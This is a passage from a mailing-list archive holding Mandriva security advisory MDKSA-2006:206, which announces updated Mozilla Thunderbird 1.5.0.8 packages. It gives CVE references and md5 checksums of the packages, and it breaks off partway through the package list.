 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
75x+jP9FNzlE7ieAV3r7Czs=
=DdKu
-----END PGP SIGNATURE-----



From security at mandriva.com  Fri Dec 15 21:34:58 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 15 Dec 2006 14:34:58 -0700
Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages
	fix multiple vulnerabilities
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:206
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : mozilla-thunderbird
 Date    : November 9, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 0a2828dbab70a2be0e721cc016f93d7f  2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 defa2ac291c66f693946362bd2501c40  2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
 c5540aa8289eefbf3e708e442de77aa8  2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 45da9968c4661ef994ef1dcefd0ad54f  2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
 df8d2ea1013a65457aa1f2100060d968  2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 f87f2441b2ca36d4f5c3f3f2dd04b3bb  2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 bc3a281fbc5c09b7f962dfb1d3b9e517  2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 2563050985477697472069d08e96de0f  2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
 e22be985ae58ab3eba5b90aa6a3eb58e  2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
 fde0d1b9c4feee3c1e239345f4065090  2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
 10be2386887a6c70bc4f9c0453b33072  2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 1c92d5ee79fc52ec1525f3c96dfa1916  2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 42e6ddb4a33a297c71b996bf651a4d69  2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 96394d1245284a886b954bb063c0ab5b  2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 8386317130e064260bd8b114616410ed  2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 eb622e8adc0767e090a608e80a1611b7  2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 3ca6736aaf725851a0be21f0490aeb20  2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 47b16b8c45acc936b62051594ed87c69  2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 c2e742162882c52761040025ff4ddfff  2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 072c5224bd49a45ba7ab0a57f657ec6e  2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
 3393e810730d305adc4fe8ecc98b782a  2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 70882501b0fc01a56cee67c2b7c63ac5  2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 47aa8c7af46ee44f1b51e0f44772beeb  2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e284b46733e04ab96cccb612de04e5a8  2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e73efd093c48aa82d6f73025f1ade443  2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ed790bdd1a45343b427925765f5f2b5c  2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 61690a97ef04b6083693ffe4a9ab3176  2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 889574eda89385739aad6eda7f3d2604  2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ef9b59cdd619da74737b5e91e4067386  2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e20a88ece32f8ee81aaedd828558d880  2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 250f6f86984922da278774d480ba37a7  2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f683dba38c9055cbac36f8468e357ebf  2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6594d0bb3f7770f168728827c1cf9f83  2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1ee011c3c94c7b081f53b9a55996da0c  2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be24dd32e628b8294c1b87d200cf02dd  2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 020acf8e510080a701c6278c6eb862ae  2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 af4c92e4f3eaf833111572ead14c8c04  2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7483c3a55198fcbc9be2c9750919a370  2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 753acdb58e6400659dab48ff78f371e7  2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 fb83f542bd12edda5e85d9873a08a938  2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 996bbfb13654cfc2180036ea6b1e61df  2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ff6217b99ab96a1444b6a758bf184ecf  2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f15d9f053011068deba71fdc05dc6d46  2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 98f63b0dedef781ec16f8bebb6a032cb  2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e5e42bb849d26a4f59fb6204d6ed9850  2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8bc9d56d4778baf40b115eb805a506b3  2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 21c7d7ffd14a724e4ce9d96e99d0f3c7  2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9b115831c8ae36d7141c93a9d867d445  2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 d6efb3cdaba13c17dd31147011796614  2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4239765036a0bffaa4fcff9fb076a221  2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be87cc456600cb0dc18730ae3f75af92  2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 459367e42865a1de4374d2a9b8c36232  2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e1b30720806b2c6ab650251f9756127  2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 70c5525bea63d291374706abfb4523c4  2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4addf81f6fdb0fe55d2274ba726d066e  2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9c9a1e6a7623a712f40666e77fd3f2b4  2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9cd9d0509bbe4d0bc7c092118253c237  2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 b23236fc11caa38b1354893f1e9863e1  2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c5b898d7f04c26a34bb4223ee4547586  2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8e114fec014131d472790035a1509783  2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 3eda3b36a83c550a1f52faf6adfb0b10  2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c336cc525567465d1649ee55c604d3a3  2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 476f974ea2e3b9ef971231b8b08e62f0  2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7878332de8134b9025b924315d6ffbf6  2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7602f9099c26d60e934f54918dd38e46  2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 52ba4b91175db4376fd4c4e9018969c3  2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e2bc31ee83c5c47f06953aba976a27d  2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 47b180beb65802e89f7e6a8be7f33d15  2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6485a71b5d07fef3e337630aa53bb4c6  2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6b5df9cad533fc75fc47191df5f3dabf  2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99b61d660a72eff639f78ec0422aeaf2  2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99cfe247978fe85b5b5186bf12247f3a  2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8c393629997cea717c2f1e8d077a9344  2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be518e4b4833e6cb9d083871101be35b  2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8dedff0ffd0e7b7721b256f01821f188  2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 05202d61506a60981fb9a317ce6a5d5d  2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0deda88ec857fb0c11b57555814a20ec  2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0f2f7928b2edfbe0ae5faf127b0ed066  2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Corporate 3.0:
 71192ef0a8bd28533718191d287d8158  corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
 c0121a4a0192d7944b1f8d30c977ab38  corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
 53c403f48cb8547f0eb646ab1b41b656  corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 032ebcc12942292620b05929e0583f3a  corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 c88d6e26aa75dab433abcf71f2962e5c  corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
 dcc54cb45829470f4267806696b46eca  corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
 e7ba899422d7cbfd343659b810e4ee52  corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
 d987b44bd201c2a23b404751e13df538  corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
 9d496fa524a5226676f56ed87d2015ec  corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
 eac64993c47963ede70eca5fb62e30b9  corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 b5523fcbf2370d1805e1f917faaa31c8  corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 1eb806fe5a429b52f010e16aeed4cb4a  corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8da00f3e4033ec813df4548072ac9f  corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
 3a2434c868a3b5799cb69c31d43f900c  corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
 a1bb48121d53f83bf0efd303ea477b71  corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 6f9d308c194ae42cfa0787afdebff2cc  corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 bb3c3cf4056814131f8031471c81ac6f  corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 4228aaf098c501a80af97469393482b5  corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 3a95ad54416e2f002d1aaa32557cf947  corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
 19e1eac0351d89760ee31b4c9ee4fcc4  corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1c21de0415bd0223237aa82795cc9600  corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 a11487e4145c294a57a77491f6996748  corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 31064002ac59d4857c3c45c3161580dc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 fc88eeba422b084ffa67b77211248ef0  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
 4ead83e3405e7469370b4f02a9254ddc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 3a15b707a6d7f8e9b25c1ccaea023333  corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8c565fd3b42069b2e42103d98dfab2  corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 0040d479d7e55304c06df39b2233d12e  corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 6fab1321b377748e22a6709b772d5159  corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 1969ec5d6cc27df2f09f9733b5b37c6d  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 0c34a8e8bd3f9011283fe990771a857a  corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
 68781ca20e2232457046bdab86b59462  corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 37c3909b8feb9a35208519ccf4ec8a46  corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
 ea2febd0e93d9348fd580452f7adc0be  corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 2eac2aaeb4fe209f98aa85505f6a9b87  corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 d8d8fc30075f0848859cbe96b26404a7  corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
 3af19a8b01fb316451132e6460c7deb0  corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 f7aed893e50dff94f47d658d70093824  corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
 ab6ead860edf6de4935aa3bb4ecf4721  corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 a9b0bc2b2bcf186b5a284cba3d6cad19  corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
 373554b2032c20a61c48f4a4e11e5b57  corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1a2efc51627d9f55929e1b33e20f5274  corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
 27ab1d70b317c477b56df8223a8477b4  corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
 0bcd50b34bec84016747f4919b43b8e1  corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
 4b26e1653ccf78604c16b25ed7357dfb  corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 ea1a0d0349f9a2f26b23c7678d7e5736  corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 7d7c13e7a820c069b3c657adf57443d9  corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 ef0755e523de702c802890f494ee5ea0  corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 f7618d53bff6c0764297f2352c5d0239  corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 8df8db645153b5f7539044d5f892ad54  corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 d26cb2fbb5301bcf127ea4e4606f52b9  corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 f57d3dd11471a798542b87f0a3c68e82  corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 f3aede5440aeb78b59350fe56bb221d2  corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 bda7588d80565c17190fb407bdc3b1b2  corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
 5f0764d5685d0836bd718fdc86b8a73a  corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 2a1892c7e027dba761df43c98bb5e85f  corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c109965ada094232d0958a8121be977a  corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e50d4054e85e4624b285067c75cfab18  corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f8cc5e4a36961ef4db2b8632fc6734d9  corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 70e0a1878ce810ee835e7eca08a11e12  corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 50abb11664ca02e6d77cbf30396e5398  corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5565876286c51872fb0ff90df059f052  corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cdd3892a5ba2a7c1ffe29d009e9d23a9  corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
